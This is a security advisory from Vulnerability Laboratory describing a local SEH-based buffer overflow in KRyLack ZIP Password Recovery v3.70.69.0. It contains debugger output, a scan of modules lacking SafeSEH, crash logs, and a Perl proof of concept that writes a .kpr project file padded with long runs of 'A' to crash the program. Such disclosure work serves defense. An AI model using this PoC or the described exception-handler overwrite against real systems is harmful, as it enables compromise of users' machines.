Document Title: =============== ZIP Password Recovery v3.70.69.0 - Buffer Overflow Date: ===== 2020-05-29 References: =========== https://www.vulnerability-lab.com/get_content.php?id=2258 VL-ID: ===== 2258 Common Vulnerability Scoring System: ==================================== 7 Vulnerability Class: ==================== Buffer Overflow Introduction: ============= KRyLack ZIP Password Recovery is advanced software to recover lost or forgotten passwords to ZIP (WinZIP) archives. (Copy of the Homepage: https://www.krylack.com/zip-password-recovery/ ) Abstract: ========= The vulnerability labortory core research team discovered a local buffer overflow vulnerability in the KRyLack ZIP Password Recovery v3.70.69.0 software. Affected Product(s): ==================== KRyLack Software Product: ZIP Password Recovery v3.70.69.0 - Software (Windows x64) Report-Timeline: ================ 2020-06-23: Public Disclosure (Vulnerability Laboratory) Status: ======== Published Exploitation-Technique: ======================= Local Severity: ========= High Details: ======== A buffer overflow vulnerability has been discovered in the official KRyLack ZIP Password Recovery v3.70.69.0 windows software. The issue allows to overwrite local process registers to compromise the local software process or to elevate local system privileges. The vulnerability relies on overwriting one of the affecting records to throw an uncaught exception. This will detour the control flow to the code. As consequence it is possible to sumulate a EH return to fetch a pointer to jump to own malicious executable shellcode. There are three locations on how the vulnerability can be triggered overwriting the local registers. The security vulnerabilities are located in the decompress(file/path), start by (input|length) or on start import of kpr files. Successful exploitation of the overflow vulnerabilities results in overwrite of the local process registers to compromise the local computer system or elevation of privileges to compromise. Proof of Concept: ================= The buffer overflow vulnerabilities can be exploited by low privileged system user accounts without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. --- Debug Logs --- 7773c23e 8b00 mov eax,dword ptr [eax] ds:002b:41414141=[NEW ADRESS] - 77700000!RtlAllocateHeap+0x13ee: 7773c23e 8b00 mov eax,dword ptr [eax] 7773c240 8b4b04 mov ecx,dword ptr [ebx+4] 7773c243 3bc1 cmp eax,ecx 7773c245 0f8585000000 jne 77700000!RtlAllocateHeap+0x1480 (7773c2d0) 7773c24b 8d7e08 lea edi,[esi+8] 7773c24e 3bc7 cmp eax,edi 7773c250 8b7d80 mov edi,dword ptr [ebp-80h] 7773c253 757b jne 77700000!RtlAllocateHeap+0x1480 (7773c2d0) --- SEH --- /SafeSEH Module Scanner, item 107 SEH mode=/SafeSEH OFF Base=0x7d50000 Limit=0x7d9b000 Module version=2.6.0.0 Module Name=C:Program Files (x86)Free ZIP Password RecoveryUnAceV2.Dll - /SafeSEH Module Scanner, item 108 SEH mode=/SafeSEH OFF Base=0x10000000 Limit=0x10019000 Module version=5.52 Module Name=C:Program Files (x86)Free ZIP Password RecoveryUNZIP32.DLL - SAFESEH OFF /SafeSEH Module Scanner, item 110 SEH mode=/SafeSEH OFF Base=0x400000 Limit=0x8de000 Module version=3.70.69.0 Module Name=C:Program Files (x86)Free ZIP Password RecoveryKLPassRec.exe --- Event Error Logs --- Version=1 EventType=APPCRASH EventTime=132353201538881860 ReportType=2 Consent=1 UploadTime=132353201542245388 ReportStatus=268435456 ReportIdentifier=12559f73-1250-47d9-8376-2073583e4a6b IntegratorReportIdentifier=da6c5d15-71ca-4dbb-94b4-cb92514ddb3b Wow64Host=34404 Wow64Guest=332 NsAppName=KLPassRec.exe OriginalFilename=KLPassRec.exe AppSessionGuid=000011ec-0001-009a-1ee2-18d48836d601 TargetAppId=W:0006ecdb58f745b5d1f8122af44c5d4d7e6500000904!00004d16cd45a8372d7e6532c2e6e71c2e1eb01543c3!KLPassRec.exe TargetAppVer=2017//04//06:12:04:18!309729!KLPassRec.exe BootId=4294967295 ServiceSplit=1972305920 TargetAsId=347 IsFatal=1 EtwNonCollectReason=1 Response.BucketId=7970bda7222b32b0b9a92fa7771f488b Response.BucketTable=1 Response.LegacyBucketId=1849061518316882059 Response.type=4 Sig[0].Name=Anwendungsname Sig[0].Value=KLPassRec.exe Sig[1].Name=Anwendungsversion Sig[1].Value=3.70.69.0 Sig[2].Name=Anwendungszeitstempel Sig[2].Value=58e62ec2 Sig[3].Name=Fehlermodulname Sig[3].Value=KLPassRec.exe Sig[4].Name=Fehlermodulversion Sig[4].Value=3.70.69.0 Sig[5].Name=Fehlermodulzeitstempel Sig[5].Value=58e62ec2 Sig[6].Name=Ausnahmecode Sig[6].Value=c0000005 Sig[7].Name=Ausnahmeoffset Sig[7].Value=00055b42 - Version=1 EventType=APPCRASH EventTime=132353201504967293 ReportType=2 Consent=1 UploadTime=132353201508909517 ReportStatus=268435456 ReportIdentifier=d836f870-767e-498c-a94f-2bb5a8d2b2af IntegratorReportIdentifier=1ed2eb02-fe16-42a3-aabf-3814966c5160 Wow64Host=34404 Wow64Guest=332 NsAppName=KLPassRec.exe OriginalFilename=KLPassRec.exe AppSessionGuid=000011ec-0001-009a-1ee2-18d48836d601 TargetAppId=W:0006ecdb58f745b5d1f8122af44c5d4d7e6500000904!00004d16cd45a8372d7e6532c2e6e71c2e1eb01543c3!KLPassRec.exe TargetAppVer=2017//04//06:12:04:18!309729!KLPassRec.exe BootId=4294967295 ServiceSplit=1972305920 TargetAsId=347 IsFatal=1 EtwNonCollectReason=1 Response.BucketId=e8e11e527ddb930c789056ed68c1e708 Response.BucketTable=1 Response.LegacyBucketId=1770010231221380872 Response.type=4 Sig[0].Name=Anwendungsname Sig[0].Value=KLPassRec.exe Sig[1].Name=Anwendungsversion Sig[1].Value=3.70.69.0 Sig[2].Name=Anwendungszeitstempel Sig[2].Value=58e62ec2 Sig[3].Name=Fehlermodulname Sig[3].Value=StackHash_24fa Sig[4].Name=Fehlermodulversion Sig[4].Value=0.0.0.0 Sig[5].Name=Fehlermodulzeitstempel Sig[5].Value=00000000 Sig[6].Name=Ausnahmecode Sig[6].Value=c00001a5 Sig[7].Name=Ausnahmeoffset Sig[7].Value=PCH_31+0x000723CC - EventType=BEX EventTime=132353201482786514 ReportType=2 Consent=1 UploadTime=132353201495385123 ReportStatus=268435456 ReportIdentifier=9704ddf5-1112-4f8d-a3cf-5f6cb850bcb8 IntegratorReportIdentifier=00e3097b-d182-432b-a1ca-4db26143ebfd Wow64Host=34404 Wow64Guest=332 NsAppName=KLPassRec.exe OriginalFilename=KLPassRec.exe AppSessionGuid=000011ec-0001-009a-1ee2-18d48836d601 TargetAppId=W:0006ecdb58f745b5d1f8122af44c5d4d7e6500000904!00004d16cd45a8372d7e6532c2e6e71c2e1eb01543c3!KLPassRec.exe TargetAppVer=2017//04//06:12:04:18!309729!KLPassRec.exe BootId=4294967295 ServiceSplit=1972305920 TargetAsId=347 EtwNonCollectReason=1 Response.BucketId=a9f95007cb5b4c548c41b4f965e3e00e Response.BucketTable=5 Response.LegacyBucketId=2036107489797464078 Response.type=4 Sig[0].Name=Anwendungsname Sig[0].Value=KLPassRec.exe Sig[1].Name=Anwendungsversion Sig[1].Value=3.70.69.0 Sig[2].Name=Anwendungszeitstempel Sig[2].Value=58e62ec2 Sig[3].Name=Fehlermodulname Sig[3].Value=KLPassRec.exe Sig[4].Name=Fehlermodulversion Sig[4].Value=3.70.69.0 Sig[5].Name=Fehlermodulzeitstempel Sig[5].Value=58e62ec2 Sig[6].Name=Ausnahmeoffset Sig[6].Value=00055b42 Sig[7].Name=Ausnahmecode Sig[7].Value=c0000409 Sig[8].Name=Ausnahmedaten Sig[8].Value=00000015 - EventType=BEX EventTime=132353203301725508 ReportType=2 Consent=1 UploadTime=132353203304807843 ReportStatus=268435456 ReportIdentifier=a5078f25-f76a-46ca-9717-fd6a3904aed0 IntegratorReportIdentifier=51874cb6-f2e1-4481-b611-0bd8986014b5 Wow64Host=34404 Wow64Guest=332 NsAppName=KLPassRec.exe OriginalFilename=KLPassRec.exe AppSessionGuid=00001a40-0001-009a-c393-90838936d601 TargetAppId=W:0006ecdb58f745b5d1f8122af44c5d4d7e6500000904!00004d16cd45a8372d7e6532c2e6e71c2e1eb01543c3!KLPassRec.exe TargetAppVer=2017//04//06:12:04:18!309729!KLPassRec.exe BootId=4294967295 ServiceSplit=1972305920 TargetAsId=392 IsFatal=1 EtwNonCollectReason=1 Response.BucketId=384989210a0ee5447a0c8c8611072ede Response.BucketTable=5 Response.LegacyBucketId=1877029652145843934 Response.type=4 Sig[0].Name=Anwendungsname Sig[0].Value=KLPassRec.exe Sig[1].Name=Anwendungsversion Sig[1].Value=3.70.69.0 Sig[2].Name=Anwendungszeitstempel Sig[2].Value=41414141 Sig[3].Name=Fehlermodulname Sig[3].Value=StackHash_3f75 Sig[4].Name=Fehlermodulversion Sig[4].Value=0.0.0.0 Sig[5].Name=Fehlermodulzeitstempel Sig[5].Value=41414141 Sig[6].Name=Ausnahmeoffset Sig[6].Value=PCH_31+0x000723CC Sig[7].Name=Ausnahmecode Sig[7].Value=c0000005 Sig[8].Name=Ausnahmedaten Sig[8].Value=00000008 PoC: Exploit #!/usr/bin/perl # Local Buffer Overflow Exploit for KRyLack Software ZIP Password Recovery v3.70.69.0 # Vulnerability Laboratory - Benjamin Kunz Mejri my $poc = "bof_poc.kpr" ; print "[+] Producing bof_poc.kpr ..." ; my $buff0=" "."[Free ZIP Password Recovery Project Data]" x 1; #Pro Flag [ZIP Password Recovery Project Data] my $buff1=" Version Created=3.70.69" x 1; my $buff2=" EncryptedFile="."A" x 1024; my $buff3=" CurrentPass="."A" x 1024; my $buff4=" CharsSLatin="."A" x 1024; my $buff5=" CharsCLatin="."A" x 1024; my $buff6=" CharsSpace="."A" x 1024; my $buff7=" CharsDigits="."A" x 1024; my $buff8=" CharsSymbols="."A" x 1024; my $buff9=" CharsCustom="."A" x 1024; my $buff10=" "."Charset="."A" x 1024; my $buff11=" "."RecoveryType="."A" x 1024; my $buff12=" "."MinPassLen="."A" x 1024; my $buff13=" "."MaskChar="."A" x 1024; my $buff14=" "."Mask="."A" x 1024; my $buff15=" "."C:Program Files (x86)Free ZIP Password Recoverydefault_english.kpd" x 1; #Default_Windows10(x86) open(kpr, ">>$poc") or die "Cannot open $poc"; print kpr $buff0; print kpr $buff1; print kpr $buff2; print kpr $buff3; print kpr $buff4; print kpr $buff5; print kpr $buff6; print kpr $buff7; print kpr $buff8; print kpr $buff9; print kpr $buff10; print kpr $buff11; print kpr $buff12; print kpr $buff13; print kpr $buff14; print kpr $buff15; close(kpr); print "n[+] done !"; Risk: ===== The security risk of the local buffer overflow vulnerabilities in the krylack zip password recovery software is estimated as high. Credits: ======== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2020 | Vulnerability Laboratory - [Evolution Security GmbH]™